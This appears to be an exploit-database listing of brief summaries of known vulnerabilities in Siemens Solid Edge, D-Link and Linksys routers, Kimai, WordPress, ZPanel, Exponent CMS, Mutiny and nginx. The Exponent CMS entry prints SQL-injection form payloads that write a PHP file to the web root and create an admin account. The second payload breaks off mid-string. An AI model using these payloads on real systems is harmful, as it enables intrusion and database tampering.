Explore Vulnerabilities

Explore all Exploits:

SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution

The WebPartHelper ActiveX control in SIEMENS Solid Edge ST4/ST5 is vulnerable to remote command execution due to a ShellExecuteExW() call inside RFMSsvs.dll. By passing a null session share path as the URL argument of the OpenInEditor() method, an attacker can launch an arbitrary executable.

Cycle Trick Arbitrary Write

This exploit uses a cycle trick to turn it into an arbitrary write. A watchdog thread is created to patch the list atomically when ready. The exploit is triggered when the main thread is stuck in a call to FlattenPath(), and the kernel is spinning in EPATHOBJ::bFlatten(). The list is then patched to point to the exploit.

D-Link DIR615h OS Command Injection

Some D-Link routers are vulnerable to an authenticated OS command injection in their web interface, where the default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 with firmware version 8.04. A ping command against a controlled system can be used for testing purposes. The exploit uses the wget client on the device to turn the command injection into arbitrary payload execution.

Linksys WRT160nv2 apply.cgi Remote Command Injection

Some Linksys routers are vulnerable to an authenticated OS command injection in their web interface, where the default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on a Linksys WRT160n version 2 with firmware version v2.0.03. A ping command against a controlled system can be used for testing purposes. The exploit uses the tftp client on the device to stage native payloads from the command injection.

Kimai 0.9.2.1306-3 SQLi

This exploit allows an attacker to execute arbitrary SQL queries against the vulnerable Kimai 0.9.2.1306-3 application. It does not require authentication to the web app, as the affected file is accessible to any user. The attacker can adjust the paths accordingly if running against Windows.

WordPress ProPlayer Plugin SQL Injection

The WordPress ProPlayer plugin is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Arbitrary Code Execution in ZPanel

ZPanel uses a poor templating system that consists of a few str_replace calls and an eval, which does a very poor job of preventing malicious code. By injecting into the replacement that occurs on line 71, one can run arbitrary PHP code. When combined with ZPanel's `zsudo` binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments.

SQL Injection in Exponent CMS

The vulnerability exists due to insufficient filtering of the "src" and "username" HTTP GET parameters passed to the "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file containing the PHP function 'phpinfo()':

<form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="submit" id="btn"></form>

The second PoC will attempt to create a new administrative user with username "hacker" and password "hacker":

<form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT 'INSERT INTO users (username, password, is_admin) VALUES ("hacker""

Mutiny 5 Arbitrary File Upload

This module exploits a code execution flaw in the Mutiny 5 appliance. The EditDocument servlet provides a file upload function to authenticated users. A directory traversal vulnerability in the same functionality allows arbitrary file upload, which results in arbitrary code execution with root privileges. To exploit the vulnerability, a valid user (of any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.

nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)

This exploit is a proof of concept for a denial of service vulnerability in nginx versions 1.3.9 through 1.4.0. The vulnerability is caused by a flaw in the way nginx handles chunked transfer encoding requests. By sending a specially crafted request with a large chunk size, an attacker can cause the nginx worker process to crash.